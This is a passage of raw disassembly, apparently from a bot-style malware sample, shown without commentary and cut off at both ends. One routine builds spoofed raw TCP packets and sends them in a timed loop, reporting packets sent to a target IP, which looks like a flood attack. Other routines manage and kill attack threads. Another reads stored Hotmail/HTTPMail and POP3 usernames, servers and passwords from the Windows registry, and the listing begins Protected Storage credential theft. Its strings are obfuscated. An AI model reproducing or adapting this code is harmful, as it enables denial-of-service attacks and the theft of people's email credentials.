cmp [ebp+var_B4], ebx
jnz short loc_422F60
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 10h
loc_422F58: ; CODE XREF: sub_422D47+1ED�j
cmp [ebp+var_B4], ebx
jz short loc_422F7A
loc_422F60: ; CODE XREF: sub_422D47+1F5�j
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 10h
loc_422F7A: ; CODE XREF: sub_422D47+217�j
push [ebp+var_8]
call dword_4372D4 ; closesocket
push [ebp+var_C8]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
loc_422F96: ; CODE XREF: sub_422D47+1C3�j
push 10h
lea eax, [ebp+var_4C]
push ebx
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_34C]
push 100h
push eax
call dword_4372DC ; gethostname
lea eax, [ebp+var_34C]
push eax
call dword_4372A0 ; gethostbyname
mov eax, [eax+0Ch]
push ebx
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4C], 2
mov [ebp+var_C], eax
call dword_456F18 ; ntohs
mov [ebp+var_4A], ax
lea eax, [ebp+var_248]
push eax
call dword_456F5C ; inet_addr
mov [ebp+var_48], eax
mov [ebp+var_4], ebx
call edi ; dword_437184
mov [ebp+var_24], eax
call edi ; dword_437184
sub eax, [ebp+var_24]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_C0]
ja loc_42328E
push 14h
pop esi
loc_423014: ; CODE XREF: sub_422D47+541�j
call sub_429ACC
cdq
mov ecx, 0FFh
push 28h
idiv ecx
mov eax, [ebp+var_C]
mov [ebp+var_38], 45h
and eax, 0FFFFFFh
shl edx, 18h
or edx, eax
mov [ebp+var_C], edx
call dword_456F18 ; ntohs
cmp [ebp+var_B8], ebx
mov [ebp+var_36], ax
mov [ebp+var_34], 1
mov [ebp+var_32], bx
mov [ebp+var_30], 80h
mov [ebp+var_2F], 6
mov [ebp+var_2E], bx
jz short loc_423064
mov eax, [ebp+var_C]
jmp short loc_42306F
; ---------------------------------------------------------------------------
loc_423064: ; CODE XREF: sub_422D47+316�j
push offset dword_457C20
call dword_456F5C ; inet_addr
loc_42306F: ; CODE XREF: sub_422D47+31B�j
cmp [ebp+var_C4], ebx
mov [ebp+var_2C], eax
mov eax, [ebp+var_48]
mov [ebp+var_28], eax
jnz short loc_423090
call sub_429ACC
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_423096
; ---------------------------------------------------------------------------
loc_423090: ; CODE XREF: sub_422D47+337�j
push [ebp+var_C4]
loc_423096: ; CODE XREF: sub_422D47+347�j
call dword_456F18 ; ntohs
mov [ebp+var_1E], ax
call sub_429ACC
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_456F18 ; ntohs
push 12345678h
mov [ebp+var_20], ax
call dword_456F14 ; ntohl
mov [ebp+var_1C], eax
lea eax, [ebp+var_1C8]
push offset aUbqs_hzpkh1 ; "/uBQS.HZPkh1"
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_4230E9
mov [ebp+var_18], ebx
mov [ebp+var_13], 2
jmp loc_42317E
; ---------------------------------------------------------------------------
loc_4230E9: ; CODE XREF: sub_422D47+394�j
lea eax, [ebp+var_1C8]
push offset a6x7zf1eztny_ ; "6x7zf1EztnY."
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_423109
mov [ebp+var_18], ebx
mov [ebp+var_13], 10h
jmp short loc_42317E
; ---------------------------------------------------------------------------
loc_423109: ; CODE XREF: sub_422D47+3B7�j
lea eax, [ebp+var_1C8]
push offset aFyflu0ji3xh_ ; "FyFlU0jI3XH."
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_423142
call sub_429ACC
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_18], edx
call sub_429ACC
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
jmp short loc_423178
; ---------------------------------------------------------------------------
loc_423142: ; CODE XREF: sub_422D47+3D7�j
lea eax, [ebp+var_1C8]
push offset a7otcu0fic6v0 ; "7otcU0FiC6V0"
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_42317E
call sub_429ACC
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_18], edx
call sub_429ACC
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, cl
loc_423178: ; CODE XREF: sub_422D47+3F9�j
add dl, 2
mov [ebp+var_13], dl
loc_42317E: ; CODE XREF: sub_422D47+39D�j
; sub_422D47+3C0�j ...
push 200h
mov [ebp+var_14], 50h
call dword_456F18 ; ntohs
mov [ebp+var_12], ax
mov eax, [ebp+var_2C]
mov [ebp+var_6C], eax
mov eax, [ebp+var_28]
push esi
mov [ebp+var_E], bx
mov [ebp+var_10], bx
mov [ebp+var_68], eax
mov [ebp+var_64], bl
mov [ebp+var_63], 6
call dword_456F18 ; ntohs
mov [ebp+var_62], ax
lea eax, [ebp+var_6C]
push 20h
push eax
lea eax, [ebp+var_A8]
push eax
call sub_429350
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_88]
push eax
call sub_429350
lea eax, [ebp+var_A8]
push 34h
push eax
call sub_41E322
mov [ebp+var_10], ax
lea eax, [ebp+var_38]
push esi
push eax
lea eax, [ebp+var_A8]
push eax
call sub_429350
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_94]
push eax
call sub_429350
push 4
lea eax, [ebp+var_80]
push ebx
push eax
call sub_429690
add esp, 44h
lea eax, [ebp+var_A8]
push 28h
push eax
call sub_41E322
mov [ebp+var_2E], ax
lea eax, [ebp+var_38]
push esi
push eax
lea eax, [ebp+var_A8]
push eax
call sub_429350
add esp, 14h
lea eax, [ebp+var_4C]
push 10h
push eax
push ebx
lea eax, [ebp+var_A8]
push 3Ch
push eax
push [ebp+var_8]
call dword_437290 ; sendto
cmp eax, 0FFFFFFFFh
jz loc_423342
push [ebp+var_BC]
inc [ebp+var_4]
call dword_43718C ; Sleep
call edi ; dword_437184
sub eax, [ebp+var_24]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_C0]
jbe loc_423014
loc_42328E: ; CODE XREF: sub_422D47+2C4�j
push [ebp+var_8]
call dword_456FD0 ; closesocket
mov eax, [ebp+var_4]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_C0]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_248]
push [ebp+var_4]
push eax
lea eax, [ebp+var_1C8]
push eax
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
lea eax, [ebp+var_2A5C]
push offset aSSWithSToIpS_S ; "%s %s with %s to IP: %s. Sent: %d packe"...
push eax
call sub_429A33
add esp, 24h
cmp [ebp+var_B0], ebx
mov edi, offset aS_5 ; "%s"
jnz short loc_42330D
cmp [ebp+var_B4], ebx
jnz short loc_423315
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 10h
loc_42330D: ; CODE XREF: sub_422D47+5A2�j
cmp [ebp+var_B4], ebx
jz short loc_42332F
loc_423315: ; CODE XREF: sub_422D47+5AA�j
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 10h
loc_42332F: ; CODE XREF: sub_422D47+5CC�j
push [ebp+var_C8]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
loc_423342: ; CODE XREF: sub_422D47+518�j
call dword_43716C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_248]
push [ebp+var_4]
push eax
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
push offset aSErrorSendingP ; "%s Error sending packets to IP: %s. Pac"...
lea eax, [ebp+var_2A5C]
push 2710h
push eax
call sub_429AEE
add esp, 1Ch
cmp [ebp+var_B0], ebx
mov edi, offset aS_5 ; "%s"
jnz short loc_4233A0
cmp [ebp+var_B4], ebx
jnz short loc_4233A8
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 10h
loc_4233A0: ; CODE XREF: sub_422D47+635�j
cmp [ebp+var_B4], ebx
jz short loc_4233C2
loc_4233A8: ; CODE XREF: sub_422D47+63D�j
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 10h
loc_4233C2: ; CODE XREF: sub_422D47+65F�j
push [ebp+var_8]
call dword_4372D4 ; closesocket
push [ebp+var_C8]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
sub_422D47 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4233DE proc near ; CODE XREF: sub_4020AA+DA�p
; sub_40242A+120�p ...
var_26F8 = byte ptr -26F8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 26F8h
call sub_429A90
lea eax, [ebp+arg_8]
push edi
push eax
lea eax, [ebp+var_26F8]
push [ebp+arg_4]
push 26F6h
push eax
call sub_42B7DA
add esp, 10h
xor edi, edi
mov eax, offset dword_46AFF0
loc_42340E: ; CODE XREF: sub_4233DE+40�j
cmp byte ptr [eax], 0
jz short loc_423422
add eax, 2724h
inc edi
cmp eax, offset dword_6607C4
jl short loc_42340E
jmp short loc_42345E
; ---------------------------------------------------------------------------
loc_423422: ; CODE XREF: sub_4233DE+33�j
push esi
mov esi, edi
imul esi, 2724h
lea eax, [ebp+var_26F8]
push 270Fh
push eax
lea eax, dword_46AFF0[esi]
push eax
call sub_429C40
mov eax, [ebp+arg_0]
and dword_46D704[esi], 0
add esp, 0Ch
and dword_46D708[esi], 0
mov dword_46D700[esi], eax
pop esi
loc_42345E: ; CODE XREF: sub_4233DE+42�j
mov eax, edi
pop edi
leave
retn
sub_4233DE endp
; =============== S U B R O U T I N E =======================================
sub_423463 proc near ; CODE XREF: sub_40A938+D49�p
; sub_4234DB+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_4234D5
cmp esi, 0CDh
jge short loc_4234D5
imul esi, 2724h
cmp dword_46D70C[esi], ebx
jz short loc_423489
inc ebp
loc_423489: ; CODE XREF: sub_423463+23�j
push edi
lea edi, dword_46D708[esi]
mov dword_46D70C[esi], ebx
mov dword_46D700[esi], ebx
mov eax, [edi]
mov dword_46D704[esi], ebx
cmp eax, ebx
jbe short loc_4234AF
push eax
call sub_42003F
pop ecx
loc_4234AF: ; CODE XREF: sub_423463+43�j
mov [edi], ebx
lea edi, dword_46D710[esi]
mov byte ptr dword_46AFF0[esi], bl
push dword ptr [edi]
call dword_456FD0 ; closesocket
push ebx
mov [edi], ebx
push dword_46D70C[esi]
call dword_437054 ; TerminateThread
pop edi
loc_4234D5: ; CODE XREF: sub_423463+D�j
; sub_423463+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_423463 endp
; =============== S U B R O U T I N E =======================================
sub_4234DB proc near ; CODE XREF: sub_40A938+CB5�p
; sub_4181F4+659�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_46AFF0
loc_4234E7: ; CODE XREF: sub_4234DB+2A�j
cmp byte ptr [esi], 0
jz short loc_4234F8
push edi
call sub_423463
test eax, eax
pop ecx
jz short loc_4234F8
inc ebx
loc_4234F8: ; CODE XREF: sub_4234DB+F�j
; sub_4234DB+1A�j
add esi, 2724h
inc edi
cmp esi, offset dword_6607C4
jl short loc_4234E7
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_4234DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42350D proc near ; CODE XREF: sub_42358B+1A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_46D704
loc_423521: ; CODE XREF: sub_42350D+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_423543
test edi, edi
jle short loc_423535
cmp [esi], edi
jz short loc_423535
cmp ebx, edi
jnz short loc_423543
loc_423535: ; CODE XREF: sub_42350D+1E�j
; sub_42350D+22�j
push ebx
call sub_423463
test eax, eax
pop ecx
jz short loc_423543
inc [ebp+var_4]
loc_423543: ; CODE XREF: sub_42350D+1A�j
; sub_42350D+26�j ...
add esi, 2724h
inc ebx
cmp esi, offset dword_662ED8
jl short loc_423521
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_42350D endp
; =============== S U B R O U T I N E =======================================
sub_42355A proc near ; CODE XREF: sub_40242A+20F�p
; sub_402646+19F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 2724h
mov dword_46D70C[eax], ecx
mov dword_46D700[eax], ecx
mov dword_46D704[eax], ecx
mov dword_46D708[eax], ecx
mov dword_46D710[eax], ecx
mov byte ptr dword_46AFF0[eax], cl
retn
sub_42355A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42358B proc near ; CODE XREF: sub_40A938+A74�p
; sub_40A938+218D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_14], eax
jz short loc_42359E
push [ebp+arg_14]
call sub_42A030
pop ecx
loc_42359E: ; CODE XREF: sub_42358B+8�j
push ebx
push esi
push edi
push eax
push [ebp+arg_18]
call sub_42350D
pop ecx
mov [ebp+arg_14], eax
test eax, eax
pop ecx
mov esi, offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
jle short loc_423602
cmp [ebp+arg_8], 0
mov ebx, offset aTfee90w_vdg1u8 ; "TFEE90W.vdG1u8Ajp1eidrT.d2k2X/no6gm/"
mov edi, offset aSSDS ; "%s %s %d %s"
jnz short loc_4235E3
cmp [ebp+arg_C], 0
jnz short loc_4235E9
push ebx
push eax
push [ebp+arg_1C]
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD84
add esp, 1Ch
loc_4235E3: ; CODE XREF: sub_42358B+3B�j
cmp [ebp+arg_C], 0
jz short loc_42364B
loc_4235E9: ; CODE XREF: sub_42358B+41�j
push ebx
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD0E
add esp, 1Ch
jmp short loc_42364B
; ---------------------------------------------------------------------------
loc_423602: ; CODE XREF: sub_42358B+2B�j
xor eax, eax
mov ebx, offset aIbtox1Hofe0hcx ; "IBtOx1/HOfe0Hcxmb/oUlVg00eWuQ.F61Hj/"
cmp [ebp+arg_8], eax
mov edi, offset aSSS_3 ; "%s (%s) %s"
jnz short loc_423631
cmp [ebp+arg_C], eax
jnz short loc_423637
cmp [ebp+arg_10], eax
jz short loc_42364B
push ebx
push [ebp+arg_1C]
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD84
add esp, 18h
loc_423631: ; CODE XREF: sub_42358B+86�j
cmp [ebp+arg_C], 0
jz short loc_42364B
loc_423637: ; CODE XREF: sub_42358B+8B�j
push ebx
push [ebp+arg_1C]
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD0E
add esp, 18h
loc_42364B: ; CODE XREF: sub_42358B+5C�j
; sub_42358B+75�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42358B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423650 proc near ; DATA XREF: sub_40A938+EAB�o
var_C8 = dword ptr -0C8h
var_C4 = byte ptr -0C4h
var_44 = dword ptr -44h
var_34 = dword ptr -34h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0C8h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov ecx, [ebp+var_C8]
mov dword ptr [eax+0BCh], 1
mov eax, [ebp+var_10]
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
mov [ebp+var_4], eax
push offset aSThreadsList ; "%s Threads List:"
test eax, eax
lea eax, [ebp+var_C4]
mov [ebp+arg_0], ecx
push eax
push ecx
jnz short loc_4236A2
call sub_41CD84
jmp short loc_4236A7
; ---------------------------------------------------------------------------
loc_4236A2: ; CODE XREF: sub_423650+49�j
call sub_41CD0E
loc_4236A7: ; CODE XREF: sub_423650+50�j
add esp, 10h
xor ebx, ebx
mov edi, offset dword_46AFF0
mov esi, offset aD_S ; "%d. %s"
loc_4236B6: ; CODE XREF: sub_423650+A8�j
cmp byte ptr [edi], 0
jz short loc_4236EB
xor eax, eax
cmp [ebp+var_34], eax
jnz short loc_4236CA
cmp [edi+2714h], eax
jnz short loc_4236EB
loc_4236CA: ; CODE XREF: sub_423650+70�j
cmp [ebp+var_4], eax
push edi
push ebx
lea eax, [ebp+var_C4]
push esi
push eax
push [ebp+arg_0]
jnz short loc_4236E3
call sub_41CD84
jmp short loc_4236E8
; ---------------------------------------------------------------------------
loc_4236E3: ; CODE XREF: sub_423650+8A�j
call sub_41CD0E
loc_4236E8: ; CODE XREF: sub_423650+91�j
add esp, 14h
loc_4236EB: ; CODE XREF: sub_423650+69�j
; sub_423650+78�j
add edi, 2724h
inc ebx
cmp edi, offset dword_6607C4
jl short loc_4236B6
cmp [ebp+var_4], 0
pop edi
pop esi
pop ebx
lea eax, [ebp+var_C4]
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push offset aSEndOfList_ ; "%s End of list."
push eax
push [ebp+arg_0]
jnz short loc_42371E
call sub_41CD84
jmp short loc_423723
; ---------------------------------------------------------------------------
loc_42371E: ; CODE XREF: sub_423650+C5�j
call sub_41CD0E
loc_423723: ; CODE XREF: sub_423650+CC�j
add esp, 10h
push [ebp+var_44]
call sub_42355A
pop ecx
push 0
call dword_437170 ; ExitThread
sub_423650 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423737 proc near ; CODE XREF: sub_40203B+5�p
; sub_4020AA+27�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_46D700
loc_42373E: ; CODE XREF: sub_423737+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_423747
inc eax
loc_423747: ; CODE XREF: sub_423737+D�j
add ecx, 2724h
cmp ecx, offset dword_662ED4
jl short loc_42373E
retn
sub_423737 endp
; =============== S U B R O U T I N E =======================================
sub_423756 proc near ; CODE XREF: sub_403374+C�p
; .text:0040A1FF�p ...
arg_0 = dword ptr 4
xor eax, eax
xor edx, edx
mov ecx, offset dword_46D700
push esi
loc_423760: ; CODE XREF: sub_423756+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_423779
add ecx, 2724h
inc edx
cmp ecx, offset dword_662ED4
jl short loc_423760
pop esi
retn
; ---------------------------------------------------------------------------
loc_423779: ; CODE XREF: sub_423756+10�j
mov eax, edx
pop esi
retn
sub_423756 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42377D proc near ; DATA XREF: sub_40A938+1265�o
var_27D4 = byte ptr -27D4h
var_C4 = dword ptr -0C4h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 27D4h
call sub_429A90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_C4]
xor ebx, ebx
rep movsd
cmp [ebp+var_3C], ebx
mov edi, [ebp+var_C4]
mov dword ptr [eax+0BCh], 1
jz short loc_4237CB
push 2710h
lea eax, [ebp+var_27D4]
push [ebp+var_3C]
push eax
call sub_429C40
add esp, 0Ch
loc_4237CB: ; CODE XREF: sub_42377D+35�j
cmp dword_457014, ebx
mov esi, offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
jnz short loc_4237DF
call sub_423850
jmp short loc_4237F5
; ---------------------------------------------------------------------------
loc_4237DF: ; CODE XREF: sub_42377D+59�j
push esi
lea eax, [ebp+var_C0]
push offset aSAdvapi_dllNot ; "%s Advapi.dll not loaded"
push eax
push edi
call sub_41CD84
add esp, 10h
loc_4237F5: ; CODE XREF: sub_42377D+60�j
cmp dword_457084, ebx
jnz short loc_423827
push [ebp+var_14]
cmp [ebp+var_3C], ebx
push [ebp+var_C]
push [ebp+var_10]
jz short loc_423824
lea eax, [ebp+var_27D4]
push eax
loc_423812: ; CODE XREF: sub_42377D+A8�j
lea eax, [ebp+var_C0]
push edi
push eax
call sub_423BB1
add esp, 18h
jmp short loc_42383D
; ---------------------------------------------------------------------------
loc_423824: ; CODE XREF: sub_42377D+8C�j
push ebx
jmp short loc_423812
; ---------------------------------------------------------------------------
loc_423827: ; CODE XREF: sub_42377D+7E�j
push esi
lea eax, [ebp+var_C0]
push offset aSPstore_dllNot ; "%s PStore.dll not loaded"
push eax
push edi
call sub_41CD84
add esp, 10h
loc_42383D: ; CODE XREF: sub_42377D+A5�j
push [ebp+var_40]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
pop edi
pop esi
pop ebx
sub_42377D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423850 proc near ; CODE XREF: sub_42377D+5B�p
var_2EC = byte ptr -2ECh
var_224 = byte ptr -224h
var_15C = byte ptr -15Ch
var_C4 = byte ptr -0C4h
var_2C = byte ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 2ECh
push ebx
push edi
xor ebx, ebx
push 3A98h
push ebx
push offset dword_66FBD0
call sub_429690
mov edi, dword_4370A4
add esp, 0Ch
lea eax, [ebp+var_224]
push offset aSoftwareMicr_1 ; "Software\\Microsoft\\Internet Account Man"...
push eax
call edi ; dword_4370A4
lea eax, [ebp+var_24]
push eax
push 0F003Fh
lea eax, [ebp+var_224]
push ebx
push eax
push 80000001h
call dword_456FA0 ; RegOpenKeyExA
test eax, eax
jnz loc_423BAD
push esi
mov [ebp+var_18], ebx
mov [ebp+var_10], 3
mov esi, 96h
loc_4238B8: ; CODE XREF: sub_423850+356�j
lea eax, [ebp+var_2C]
mov [ebp+var_1C], 0C8h
push eax
push ebx
push ebx
lea eax, [ebp+var_1C]
push ebx
push eax
lea eax, [ebp+var_2EC]
push eax
push [ebp+var_18]
push [ebp+var_24]
call dword_456E48 ; RegEnumKeyExA
mov [ebp+var_20], eax
lea eax, [ebp+var_224]
push offset aSoftwareMicr_1 ; "Software\\Microsoft\\Internet Account Man"...
push eax
call edi ; dword_4370A4
lea eax, [ebp+var_224]
push offset asc_44DA9C ; "\\"
push eax
call dword_437090 ; lstrcatA
lea eax, [ebp+var_2EC]
push eax
lea eax, [ebp+var_224]
push eax
call dword_437090 ; lstrcatA
lea eax, [ebp+var_14]
push eax
push 0F003Fh
lea eax, [ebp+var_224]
push ebx
push eax
push 80000001h
call dword_456FA0 ; RegOpenKeyExA
lea eax, [ebp+var_8]
mov [ebp+var_8], esi
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
push offset aHttpmailUserna ; "HTTPMail UserName"
push [ebp+var_14]
call dword_456DD0 ; RegQueryValueExA
test eax, eax
jnz loc_423A3C
lea eax, [ebp+var_15C]
push eax
mov eax, dword_673668
imul eax, 12Ch
add eax, offset dword_66FBD0
push eax
call edi ; dword_4370A4
push esi
lea eax, [ebp+var_15C]
push ebx
push eax
call sub_429690
mov eax, dword_673668
add esp, 0Ch
imul eax, 12Ch
add eax, offset dword_66FC98
push offset aHotmail ; "Hotmail"
push eax
call edi ; dword_4370A4
lea eax, [ebp+var_8]
mov [ebp+var_8], esi
push eax
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
push offset aHttpmailPass2 ; "HTTPMail Pass2"
push [ebp+var_14]
call dword_456DD0 ; RegQueryValueExA
test eax, eax
jnz loc_423B85
push 2
mov [ebp+var_C], ebx
pop eax
cmp [ebp+var_8], eax
mov [ebp+var_4], eax
jbe loc_423B70
loc_4239D7: ; CODE XREF: sub_423850+1E5�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_C4]
push eax
call dword_437264 ; IsCharAlphaNumericA
test eax, eax
jnz short loc_423A0A
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_C4]
cmp al, 28h
jz short loc_423A0A
cmp al, 29h
jz short loc_423A0A
cmp al, 2Eh
jz short loc_423A0A
cmp al, 20h
jz short loc_423A0A
cmp al, 2Dh
jnz short loc_423A2C
loc_423A0A: ; CODE XREF: sub_423850+19A�j
; sub_423850+1A8�j ...
mov eax, dword_673668
mov ecx, [ebp+var_4]
imul eax, 12Ch
mov edx, [ebp+var_C]
mov cl, [ebp+ecx+var_C4]
inc [ebp+var_C]
mov byte_66FC34[eax+edx], cl
loc_423A2C: ; CODE XREF: sub_423850+1B8�j
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jb short loc_4239D7
jmp loc_423B70
; ---------------------------------------------------------------------------
loc_423A3C: ; CODE XREF: sub_423850+103�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
push offset aPop3UserName ; "POP3 User Name"
push [ebp+var_14]
call dword_456DD0 ; RegQueryValueExA
test eax, eax
jnz loc_423B9C
lea eax, [ebp+var_15C]
push eax
mov eax, dword_673668
imul eax, 12Ch
add eax, offset dword_66FBD0
push eax
call edi ; dword_4370A4
push esi
lea eax, [ebp+var_15C]
push ebx
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_8]
mov [ebp+var_8], esi
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
push offset aPop3Server ; "POP3 Server"
push [ebp+var_14]
call dword_456DD0 ; RegQueryValueExA
lea eax, [ebp+var_15C]
push eax
mov eax, dword_673668
imul eax, 12Ch
add eax, offset dword_66FC98
push eax
call edi ; dword_4370A4
push esi
lea eax, [ebp+var_15C]
push ebx
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_8]
mov [ebp+var_8], esi
push eax
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
push offset aPop3Pass2 ; "POP3 Pass2"
push [ebp+var_14]
call dword_456DD0 ; RegQueryValueExA
test eax, eax
jnz loc_423B85
push 2
mov [ebp+var_C], ebx
pop eax
cmp [ebp+var_8], eax
mov [ebp+var_4], eax
jbe short loc_423B70
loc_423B10: ; CODE XREF: sub_423850+31E�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_C4]
push eax
call dword_437264 ; IsCharAlphaNumericA
test eax, eax
jnz short loc_423B43
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_C4]
cmp al, 28h
jz short loc_423B43
cmp al, 29h
jz short loc_423B43
cmp al, 2Eh
jz short loc_423B43
cmp al, 20h
jz short loc_423B43
cmp al, 2Dh
jnz short loc_423B65
loc_423B43: ; CODE XREF: sub_423850+2D3�j
; sub_423850+2E1�j ...
mov eax, dword_673668
mov ecx, [ebp+var_4]
imul eax, 12Ch
mov edx, [ebp+var_C]
mov cl, [ebp+ecx+var_C4]
inc [ebp+var_C]
mov byte_66FC34[eax+edx], cl
loc_423B65: ; CODE XREF: sub_423850+2F1�j
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jb short loc_423B10
loc_423B70: ; CODE XREF: sub_423850+181�j
; sub_423850+1E7�j ...
mov eax, dword_673668
mov ecx, [ebp+var_C]
imul eax, 12Ch
mov byte_66FC34[eax+ecx], bl
loc_423B85: ; CODE XREF: sub_423850+16F�j
; sub_423850+2AC�j
push esi
lea eax, [ebp+var_C4]
push ebx
push eax
call sub_429690
add esp, 0Ch
inc dword_673668
loc_423B9C: ; CODE XREF: sub_423850+20C�j
inc [ebp+var_18]
cmp [ebp+var_20], 103h
jnz loc_4238B8
pop esi
loc_423BAD: ; CODE XREF: sub_423850+52�j
pop edi
pop ebx
leave
retn
sub_423850 endp
; =============== S U B R O U T I N E =======================================
sub_423BB1 proc near ; CODE XREF: sub_42377D+9D�p
mov eax, offset loc_4365B0
call sub_42B6FC
sub esp, 0DF0h
push ebx
push esi
push edi
push offset aProtectedstora ; "ProtectedStorage"
call sub_427FA1
test eax, eax
pop ecx
jnz short loc_423C26
cmp [ebp+14h], eax
